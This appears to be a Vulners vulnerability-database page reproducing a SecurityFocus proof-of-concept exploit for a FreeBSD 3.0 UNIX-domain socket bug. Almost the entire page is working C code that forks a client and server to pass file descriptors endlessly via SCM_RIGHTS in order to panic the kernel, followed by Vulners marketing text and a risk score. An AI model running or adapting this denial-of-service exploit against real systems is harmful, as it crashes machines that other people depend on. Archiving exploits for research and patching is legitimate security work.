Vulners
Lucene search
FreeBSD <= 3.0 UNIX-domain panic Vulnerability
source: http://www.securityfocus.com/bid/168/info
A vulnerability in FreeBSD's UNIX-domain protocol implementation of file descriptor passing can cause the kernel to panic.
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#define PATH "/tmp/123"
#define PATH_TMP "/tmp/123.tmp"
#define SOME_FILE "/etc/passwd"
struct mycmsghdr {
struct cmsghdr hdr;
int fd;
};
extern errno;
void server();
void client();
void main()
{
switch ( fork()) {
case -1:
printf( "fork error %d\n",errno);
break;
case 0:
for (;;) client();
default:
server();
}
}
void server()
{
struct sockaddr_un addr;
struct msghdr mymsghdr;
struct mycmsghdr ancdbuf;
char data[ 1];
int sockfd,
len,
fd;
if ( unlink( PATH) == -1)
printf( "unlink error %d\n",errno);
if (( sockfd = socket( AF_UNIX,SOCK_DGRAM,0)) == -1)
printf( "socket error %d\n",errno);
strcpy( addr.sun_path,PATH);
addr.sun_len = sizeof( addr.sun_len) + sizeof( addr.sun_family)
+ strlen( addr.sun_path);
addr.sun_family = AF_UNIX;
if ( bind( sockfd,(struct sockaddr *) &addr,addr.sun_len) == -1)
printf( "bind error %d\n",errno);
for (;;) {
if (( fd = open( SOME_FILE,O_RDONLY)) == -1)
printf( "open file error %d\n",errno);
len = sizeof( addr.sun_path);
if ( recvfrom( sockfd,&data,sizeof( data),0,
(struct sockaddr *) &addr,&len) == -1)
printf( "recvfrom error %d\n",errno);
ancdbuf.hdr.cmsg_len = sizeof( ancdbuf);
ancdbuf.hdr.cmsg_level = SOL_SOCKET;
ancdbuf.hdr.cmsg_type = SCM_RIGHTS;
ancdbuf.fd = fd;
mymsghdr.msg_name = (caddr_t) &addr;
mymsghdr.msg_namelen = len;
mymsghdr.msg_iov = NULL;
mymsghdr.msg_iovlen = 0;
mymsghdr.msg_control = (caddr_t) &ancdbuf;
mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len;
mymsghdr.msg_flags = 0;
if ( sendmsg( sockfd,&mymsghdr,0) == -1)
printf( "sendmsg error %d\n",errno);
close( fd);
}
}
void client()
{
struct sockaddr_un addr_s,
addr_c;
struct mycmsghdr ancdbuf;
struct msghdr mymsghdr;
char data[ 1];
int sockfd,
len,
fd;
if (( sockfd = socket( AF_UNIX,SOCK_DGRAM,0)) == -1)
printf( "socket error %d\n",errno);
if ( unlink( PATH_TMP) == -1)
printf( "unlink error %d\n",errno);
strcpy( addr_c.sun_path,PATH_TMP);
addr_c.sun_len = sizeof( addr_c.sun_len) + sizeof(addr_c.sun_family)
+ strlen( addr_c.sun_path);
addr_c.sun_family = AF_UNIX;
strcpy( addr_s.sun_path,PATH);
addr_s.sun_len = sizeof( addr_s.sun_len) + sizeof(addr_s.sun_family)
+ strlen( addr_s.sun_path);
addr_s.sun_family = AF_UNIX;
if ( bind( sockfd,(struct sockaddr*) &addr_c,addr_c.sun_len) == -1)
printf( "bind error %d\n",errno);
if ( sendto( sockfd,&data,sizeof( data),0,(struct sockaddr *) &addr_s,
addr_s.sun_len) == -1)
printf( "sendto error %d\n",errno);
len = addr_s.sun_len;
ancdbuf.hdr.cmsg_len = sizeof( ancdbuf);
ancdbuf.hdr.cmsg_level = SOL_SOCKET;
ancdbuf.hdr.cmsg_type = SCM_RIGHTS;
mymsghdr.msg_name = NULL;
mymsghdr.msg_namelen = 0;
mymsghdr.msg_iov = NULL;
mymsghdr.msg_iovlen = 0;
mymsghdr.msg_control = (caddr_t) &ancdbuf;
mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len;
mymsghdr.msg_flags = 0;
if ( recvmsg( sockfd,&mymsghdr,0) == -1)
printf( "recvmsg error %d\n",errno);
fd = ancdbuf.fd;
close(fd);
close( sockfd);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1